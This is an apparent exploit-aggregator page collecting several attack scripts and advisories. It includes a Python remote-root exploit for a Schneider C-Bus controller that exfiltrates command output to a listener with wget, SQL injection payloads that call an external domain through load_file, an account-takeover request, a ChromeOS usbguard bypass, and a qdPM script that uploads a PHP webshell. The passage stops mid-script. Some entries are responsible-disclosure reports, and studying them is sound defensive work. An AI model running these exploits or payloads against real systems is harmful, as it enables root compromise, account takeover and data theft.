Latest exploits :: CodePwn

<pre><code>#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit # # # Vendor: Schneider Electric SE # Product web page: https://www.se.com | https://www.clipsal.com # Product details: # - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC # - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/ # Affected version: CLIPSAL 5500SHAC (i.MX28) # CLIPSAL 5500NAC (i.MX28) # SW: 1.10.0, 1.6.0 # HW: 1.0 # Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2 # SpaceLogic C-Bus # # Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser # for C-Bus Automation Controller (5500SHAC)) is an advanced controller from # Schneider Electric. It is specifically designed to unite the C-Bus home # automation solution with common household communication protocols, from # lighting and climate control, to security, entertainment and energy metering. # The Wiser for C-Bus Automation Controller manages and controls C-Bus systems # for residential homes or zones within a building and integrates functions # such as heating/cooling, energy/load monitoring and remote control for C-Bus # and Modbus. # # Desc: The automation controller suffers from an authenticated arbitrary # command execution vulnerability. An attacker can abuse the Start-up (init) # script editor and exploit the 'script' POST parameter to insert malicious # Lua script code and execute commands with root privileges that will grant # full control of the device. # # ------------------------------------------------------------------------------ # $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888 # ---------------------------------------------------------------------- # Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38 # [*] Starting exfiltration handler on port 8888 # [*] Writing Lua initscript... done. # [*] Running os.execute()... done. # [*] Got request from 192.168.0.10:33522 # [*] Printing target's request: # # b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user # 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption # password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection: # close\r\n\r\n" # # [*] Cleaning up... done. # # $ # ------------------------------------------------------------------------------ # # Tested on: CPU model: ARM926EJ-S rev 5 (v5l) # GNU/Linux 4.4.115 (armv5tejl) # LuaJIT 2.0.5 # FlashSYS v2 # nginx # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2022-5707 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php # # # 12.03.2022 # import threading#! import datetime##! import requests##! import socket####! import time######! import sys#######! import re########! from requests.auth import HTTPBasicAuth from time import sleep as spikaj class Wiser: def __init__(self): self.headers = None self.uri = '/scada-main/scripting/' self.savs = self.uri + 'save' self.runs = self.uri + 'run' self.start = datetime.datetime.now() self.start = self.start.strftime('%d.%m.%Y %H:%M:%S') self.creds = HTTPBasicAuth('admin', 'admin123') def memo(self): if len(sys.argv) != 5: self.use() else: self.target = sys.argv[1] self.execmd = sys.argv[2] self.localh = sys.argv[3] self.localp = int(sys.argv[4]) if not 'http' in self.target: self.target = 'http://{}'.format(self.target) def exfil(self): print('[*] Starting exfiltration handler on port {}'.format(self.localp)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', self.localp)) while True: try: s.settimeout(9) s.listen(1) conn, addr = s.accept() print('[*] Got request from {}:{}'.format(addr[0], addr[1])) data = conn.recv(2003) print('[*] Printing target\'s request:') print('\n%s' %data) except socket.timeout as p: print('[!] Something\'s not right. Check your port mappings!') break s.close() self.clean() def mtask(self): konac = threading.Thread(name='thricer.exe', target=self.exfil) konac.start() self.byts() def byts(self): self.headers = { 'Referer':self.target+'/scada-main/main/editor?id=initscript', 'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"', 'Cookie':'x-logout=0; x-auth=; x-login=1; pin=', 'Content-Type':'text/plain;charset=UTF-8', 'User-Agent':'SweetHomeAlabama/2003.59', 'X-Requested-With':'XMLHttpRequest', 'Accept-Language':'en-US,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'Sec-Ch-Ua-Platform':'"Windows"', 'Sec-Fetch-Site':'same-origin', 'Connection':'keep-alive', 'Sec-Fetch-Dest':'empty', 'Sec-Ch-Ua-Mobile':'?0', 'Sec-Fetch-Mode':'cors', 'Origin':self.target, 'Accept':'*/*', 'sec-gpc':'1' } self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={ self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"", self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"", self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript", self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null, self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"} self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "` self.loada += self.execmd # [command input] self.loada += '\x60\x22\x20' # `". self.loada += self.localh+':'+str(self.localp) # [listener input] self.loada += '\x27\x29' # ') self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={ self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"} print('[*] Writing Lua initscript... ', end='') sys.stdout.flush() spikaj(0.7) htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(17) else: print('done.') print('[*] Running os.execute()... ', end='') sys.stdout.flush() spikaj(0.7) htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(19) else: print('done.') def splash(self): Baah_loon = ''' ###### ########## ###### _\_ ##===----[.].] #( , _\\ # )\__| \ / `-._``-' >@ | | | | | Schneider Electric C-Bus SmartHome Automation Controller | Root Remote Code Execution Proof of Concept | ZSL-2022-5707 | | | ''' print(Baah_loon) def use(self): self.splash() print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]') exit(0) def clean(self): print('\n[*] Cleaning up... ', end='') sys.stdout.flush() spikaj(0.7) self.headers = {'X-Requested-With':'XMLHttpRequest'} self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32' self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30' self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32' self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78' self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35' self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32' self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D' self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32' self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25' self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F' self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25' self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43' self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70' self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41' self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32' self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70' self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25' self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43' self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41' self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69' self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32' self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33' self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25' self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C' self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74' self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######' self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}' htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(18) else: print('done.') exit(-1) def main(self): print('-'*70) print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start) self.memo(), self.mtask() if __name__ == '__main__': Wiser().main() </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: User Meta Vendor URL: https://wordpress.org/plugins/user-meta Type: Relative Path Traversal [CWE-23] Date found: 2022-02-28 Date published: 2022-05-24 CVSSv3 Score: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) CVE: CVE-2022-0779 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== User Meta Lite 2.4.3 and below User Meta Pro 2.4.3 and below 4. INTRODUCTION =============== An easy-to-use user profile and management plugin for WordPress that allows user login, reset-password, profile update and user registration with extra fields, all on front-end and many more. User Meta Pro is a versatile user profile builder and user management plugin for WordPress that has the most features on the market. User Meta aims to be your only go to plugin for user management. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The WordPress ajax action "um_show_uploaded_file" is vulnerable to an authenticated path traversal when user-supplied input to the HTTP POST parameter "filepath" is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to enumerate local server files using a blind approach. This is because the application doesn't return the contents of the referenced file but instead returns different form elements based on whether a file exists or not. The following Proof-of-Concept triggers this vulnerability: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 147 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: [your-wordpress-auth-cookies] Connection: close field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true 6. RISK ======= The vulnerability can be used by an authenticated attacker to enumerate local server files based on a blind approach. 7. SOLUTION =========== Update to User Meta/User Meta Pro 2.4.4 8. REPORT TIMELINE ================== 2022-02-28: Discovery of the vulnerability 2022-02-28: WPScan (CNA) assigns CVE-2022-0779 2022-03-03: Contacted the vendor via their contact form 2022-03-06: Vendor response, acknowledgement of the issue 2022-03-18: Version 2.4.2 is released 2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again. 2022-04-13: No response, contacted vendor again 2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest. 2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again. 2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine 2022-05-16: Fix seems to work 2022-05-24: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories </code></pre>

<pre><code># Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated) # Date: 28/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux Description : ---------------------- Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters # HTTPS Request : POST /isms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555 Content-Length: 1023 Origin: http://localhost Connection: close Referer: http://localhost/isms/admin/?page=user/manage_user Cookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="id" 1 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="firstname" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="middlename" -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="lastname" hi -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="username" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="password" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="type" 1 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------89160456138077069512415726555-- ==== URL Login : http://localhost/isms/admin/login.php </code></pre>

<pre><code>## Title: Fast Food Ordering System 1.0 SQLi ## Author: nu11secur1ty ## Date: 05.30.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering ## Description: The date parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+' was submitted in the date parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: date (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: page=reports&date=2022-05-30'+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'' OR NOT 9209=9209 AND 'OBPK'='OBPK Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=reports&date=2022-05-30'+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'' AND (SELECT 1113 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(1113=1113,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BQRx'='BQRx Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=reports&date=2022-05-30'+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'' AND (SELECT 2021 FROM (SELECT(SLEEP(5)))KAaB) AND 'ECXY'='ECXY Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: page=reports&date=2022-05-30'+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178716271,0x785874484e685679414c78427953454c4b62524778654f596e645841574978764f414a7a6d616372,0x71706a7671),NULL,NULL,NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering) ## Proof and Exploit: [href](https://streamable.com/kkyrgk) </code></pre>

<pre><code>Tigase XMPP server: XMPP stanza smuggling via unescaped qutes Tigase XMPP server suffers from a security vulnerability due to not escaping double quote character when serializing parsed XML. This can be used to \"smuggle\" (or, if you prefer, inject) arbitrary attacker-controlled stanza in the XMPP server's output stream. A malicious client can abuse this vulnerability to send arbitrary XMPP stanzas to another client (including the control stanzas that are only meant to be sent by the server). Consider for example the following XML tag <foo attr='aaa\"bbb' /> which contains a single attribute enclosed in *single* quotes. When Tigase parses and then serializes the element, it will convert single quotes to double quotes, however it will not escape the double quote. Thus the output becomes <foo attr=\"aaa\"bbb\" /> Which is invalid XML. The corresponding code for serializing attributes can be seen in https://github.com/tigase/tigase-xmltools/blob/b0c64df99f62b88bec7c152d52027369b6415ada/src/main/java/tigase/xml/Element.java#L845 To see how this issue can be used to smuggle arbitrary stanzas through the server, consider for example the following incoming stanza <message ...> <body> <body a='a\"/>' >text</body> <message a='a\"/>' >text</message> <iq>...</iq> <message a='a\">' /> <body a='a\">' /> </body> </message> When this stanza gets parsed by the server, the corresponding tree is -message --body ---body with attribute name=a value=a\"/> ----cdata=text ---message with attribute name=a value=a\"/> ----cdata=text ---iq ---message with attribute name=a value=a\"> ---body with attribute name=a value=a\"> However, when such a stanza gets serialized and forwarded to the recipient client (or another XMPP server) it becomes <message ...><body><body a=\"a\"/>\" >text</body><message a=\"a\"/>\" >text</message><iq>...</iq><message a=\"a\">\" /><body a=\"a\">\" /></body></message> (single quoted attributes became double quoted) When the receiving client parses it, the corresponding tree is seen as -message --body ---body with attribute name=a value=a ---cdata=\" >text --message with attribute name=a value=a --cdata=\" >text -iq -message with attribute name=a value=a --cdata=>\" /> --body with attribute name=a value=a ---cdata=>\" /> This works because, after the quote, we used '/>' instead of '>' and vice-versa to change the semantics of the closing tags. As can be seen in the tree above, the receiving client will consider the iq tag (that was originally a part of the message body tree) as a new stanza at the same \"depth\" in the XML tree as the message stanza. As mentioned above, this can be used to \"smuggle\" arbitrary stanzas through the XMPP server to the victim client. This can be used for message spoofing (making it appear a message was sent by a different sender), but also, depending on the XMPP extensions the client implements and what data is sent over XMPP, it can have impact beyond that (e.g. potentially redirecting the connection through a malicious XMPP server, code execution). This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-06-12. Found by: ifratric@google.com </code></pre>

<pre><code>ChromeOS' usage of usbguard is bypassable VULNERABILITY DETAILS ChromeOS uses https://usbguard.github.io/ when the screen is locked (but not on the login screen, perhaps because it is expected that code execution is much less helpful when the disk is still encrypted?). When the screen is locked, a policy is applied that might look like this (example from my Pixelbook): ``` allow id 0bda:564b serial \"\\x07LOE65001063010A78M015CFAI06BF12000\" name \"WebCamera\" hash \"KsByWtMB5JtGNDimauArXMiZOThFwagdTWeQsMAZ48c=\" with-interface { 0e:01:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 } with-connect-type \"hardwired\" allow id 1d6b:0002 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"jEP/6WzviqdJ5VSeTUY8PatCNBKeaREvo2OqdplND/o=\" with-interface 09:00:00 with-connect-type \"\" allow id 1d6b:0003 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"3Wo3XWDgen1hD5xM3PSNl3P98kLp1RUTgGQ5HSxtf8k=\" with-interface 09:00:00 with-connect-type \"\" allow id 8087:0a2a serial \"\" name \"\" hash \"AyPZWy2XK0931kB9A/owYfk5xHEqnpDsJfdeLSGIyuk=\" with-interface { e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 } with-connect-type \"hardwired\" #################################################################################################### # Footer. #################################################################################################### block with-interface one-of { 05:*:* 06:*:* 07:*:* 08:*:* } # physical, image, printer, storage allow ``` As you can see, it mostly just allowlists specific devices with full hashes of the expected USB configuration descriptors, and internal USB devices are marked such that they won't be accepted on external USB ports. (Which, by the way, might not actually be necessary, since the USB subsystem's `authorized_default` flag is set to 2 when the screen is locked, not 0, meaning internal USB devices are automatically allowed anyway?) But then at the bottom is this footer that blocks USB devices with interface descriptors that contain the following `bInterfaceClass` values: - USB_CLASS_PHYSICAL (5) - USB_CLASS_STILL_IMAGE (6) - USB_CLASS_PRINTER (7) - USB_CLASS_MASS_STORAGE (8) Afterwards, anything else is permitted. This configuration footer comes from <https://source.chromium.org/chromiumos/chromiumos/codesearch/+/main:src/third_party/chromiumos-overlay/sys-apps/usbguard/files/99-rules.conf>. The interface-based classification of devices was introduced in <https://chromium-review.googlesource.com/c/chromiumos/overlays/chromiumos-overlay/+/1217622/>. Apart from the problem that there is a large amount of attack surface in drivers for devices that don't belong into those USB interface classes, there is another issue with this approach: The kernel often doesn't care what USB class a device claims to be. The way USB drivers tend to work, even for standardized protocols, is that the driver specifies with low priority that it would like to bind to standards-compliant devices using the proper USB interface class, but also specifies with high priority that it would like to bind to specific USB devices based on Vendor ID and Product ID, without caring about their USB interface class. As an example, USB_CLASS_MASS_STORAGE is blocklisted, so a USB stick inserted while the screen is locked doesn't get past the authorization check: [ 6411.611320] usb 1-1: new high-speed USB device number 31 using xhci_hcd [ 6411.738900] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 0.10 [ 6411.738910] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [ 6411.738916] usb 1-1: Product: [...] [ 6411.738921] usb 1-1: Manufacturer: SanDisk [ 6411.738926] usb 1-1: SerialNumber: [...] [ 6411.740583] usb 1-1: Device is not authorized for usage [ 6414.875133] cros-ec-sensorhub [...] [ 6418.603609] usb 1-1: USB disconnect, device number 31 But if we use a Linux machine with appropriate hardware (I'm using a NET2380 dev board, but you could probably also do it with an unlocked Pixel phone or a Raspberry Pi Zero W or something like that) to emulate a USB Mass Storage device, using <https://docs.kernel.org/usb/mass-storage.html>, and patch one line in the attacker kernel so that it claims to be a billboard, not a storage device: diff --git a/drivers/usb/gadget/function/storage_common.c b/drivers/usb/gadget/function/storage_common.c index b859a158a414..d7452c8458a9 100644 --- a/drivers/usb/gadget/function/storage_common.c +++ b/drivers/usb/gadget/function/storage_common.c @@ -34,7 +34,7 @@ struct usb_interface_descriptor fsg_intf_desc = { .bDescriptorType = USB_DT_INTERFACE, .bNumEndpoints = 2, /* Adjusted during fsg_bind() */ - .bInterfaceClass = USB_CLASS_MASS_STORAGE, + .bInterfaceClass = USB_CLASS_BILLBOARD, .bInterfaceSubClass = USB_SC_SCSI, /* Adjusted during fsg_bind() */ .bInterfaceProtocol = USB_PR_BULK, /* Adjusted during fsg_bind() */ .iInterface = FSG_STRING_INTERFACE, Then we can connect just fine even while the screen is locked - first we get a \"Device is not authorized\" message on the initial connection, then usbguard unblocks us and the kernel probes the device as a mass storage device and scans the partition table: [ 6432.752906] usb 1-1: new high-speed USB device number 32 using xhci_hcd [ 6432.885635] usb 1-1: New USB device found, idVendor=0525, idProduct=a4a5, bcdDevice= 5.17 [ 6432.885647] usb 1-1: New USB device strings: Mfr=3, Product=4, SerialNumber=0 [ 6432.885653] usb 1-1: Product: Mass Storage Gadget [ 6432.885658] usb 1-1: Manufacturer: Linux 5.17.0-rc4+ with net2280 [ 6432.886121] usb 1-1: Device is not authorized for usage [ 6432.891672] usb-storage 1-1:1.0: USB Mass Storage device detected [ 6432.891985] usb-storage 1-1:1.0: Quirks match for vid 0525 pid a4a5: 10000 [ 6432.892090] scsi host0: usb-storage 1-1:1.0 [ 6432.892567] usb 1-1: authorized to connect [ 6433.920354] scsi 0:0:0:0: Direct-Access Linux File-Stor Gadget 0517 PQ: 0 ANSI: 2 [ 6433.922585] sd 0:0:0:0: Power-on or device reset occurred [ 6433.923533] sd 0:0:0:0: [sda] 204800 512-byte logical blocks: (105 MB/100 MiB) [ 6434.030869] sd 0:0:0:0: [sda] Write Protect is off [ 6434.030876] sd 0:0:0:0: [sda] Mode Sense: 0f 00 00 00 [ 6434.136540] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 6434.363462] sda: sda1 sda2 [ 6434.585367] cros-ec-sensorhub [...] [ 6434.588541] sd 0:0:0:0: [sda] Attached SCSI disk I haven't looked at how this issue applies to other USB subsystems in detail, but from a quick glance: - USB_CLASS_PHYSICAL doesn't really show up in the Linux kernel outside of some number-to-string translation table, so I don't think it matters to the kernel. - Same thing with USB_CLASS_STILL_IMAGE. - The usblp subsystem does have an explicit check for USB_CLASS_PRINTER - but that check is intentionally bypassed for known devices that are marked in the kernel as USBLP_QUIRK_BAD_CLASS, and that flag is set for the \"Seiko Epson Receipt Printer M129C\" (vendor 0x04b8, device 0x0202), so you can probably also bypass the blocking of the printer interface class that way. I think the best way forward would be to look into whether it is feasible to rely exclusively on a trust-on-first-use approach. If that is infeasible, you may have to talk to upstream about how userspace can reliably determine which driver(s) a given USB device might be bound to, since I'm not aware of any interface that would let you do that. VERSION Google Chrome 98.0.4758.107 (Official Build) (64-bit) Revision a2ef32d533baed737df9fc2ed8d505405ecf0c66-refs/branch-heads/4758@{#1167} Platform 14388.61.0 (Official Build) stable-channel eve Firmware Version Google_Eve.9584.230.0 Customization ID GOOGLE-EVE ARC 8165997 CREDIT INFORMATION Reporter credit: Jann Horn of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-05-25. Found by: jannh@google.com </code></pre>

<pre><code># Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net # Date: 2021-08-03 # Original Exploit Author: Rishal Dwivedi (Loginsoft) # Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954) # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: http://qdpm.net/ # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: <=1.9.1 # Tested on: Ubuntu Server 20.04 (Python 3.9.2) # CVE : CVE-2020-7246 # Exploit written in Python 3.9.2 # Tested Environment - Ubuntu Server 20.04 LTS # Path Traversal + Remote Code Execution # Exploit modification: RedHatAugust #!/usr/bin/python3 import sys import requests from lxml import html from argparse import ArgumentParser session_requests = requests.session() def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): request_1 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, uservar), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[remove_photo]': (None, '1'), } return request_1 def req(userid, username, csrftoken_, EMAIL, HOSTNAME): request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess') new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1) request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess') new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2) request_3 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, ''), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'), } upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3) def main(HOSTNAME, EMAIL, PASSWORD): url = HOSTNAME + '/index.php/login' result = session_requests.get(url) #print(result.text) login_tree = html.fromstring(result.text) authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token} result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) # The designated admin account does not have a myAccount page account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') account_tree = html.fromstring(account_page.content) userid = account_tree.xpath("//input[@name='users[id]']/@value") username = account_tree.xpath("//input[@name='users[name]']/@value") csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value") req(userid, username, csrftoken_, EMAIL, HOSTNAME) get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') final_tree = html.fromstring(get_file.content) backdoor = requests.get(HOSTNAME + "uploads/users/") count = 0 dateStamp = "1970-01-01 00:00" backdoorFile = "" for 